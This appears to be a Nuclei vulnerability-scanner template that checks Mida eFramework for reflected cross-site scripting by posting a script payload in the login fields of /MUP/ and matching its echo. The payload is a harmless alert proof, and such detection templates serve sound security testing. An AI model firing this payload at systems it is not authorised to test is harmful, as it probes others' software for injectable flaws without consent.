nuclei-templates/vulnerabilities/other/mida-eframework-xss.yaml

27 lines
682 B
YAML

id: mida-eframework-xss
info:
name: Mida eFramework - Cross Site Scripting
author: pikpikcu
severity: medium
tags: mida,xss
requests:
- raw:
- |
POST /MUP/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/MUP
UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>javascript:alert(document.cookie)</script>'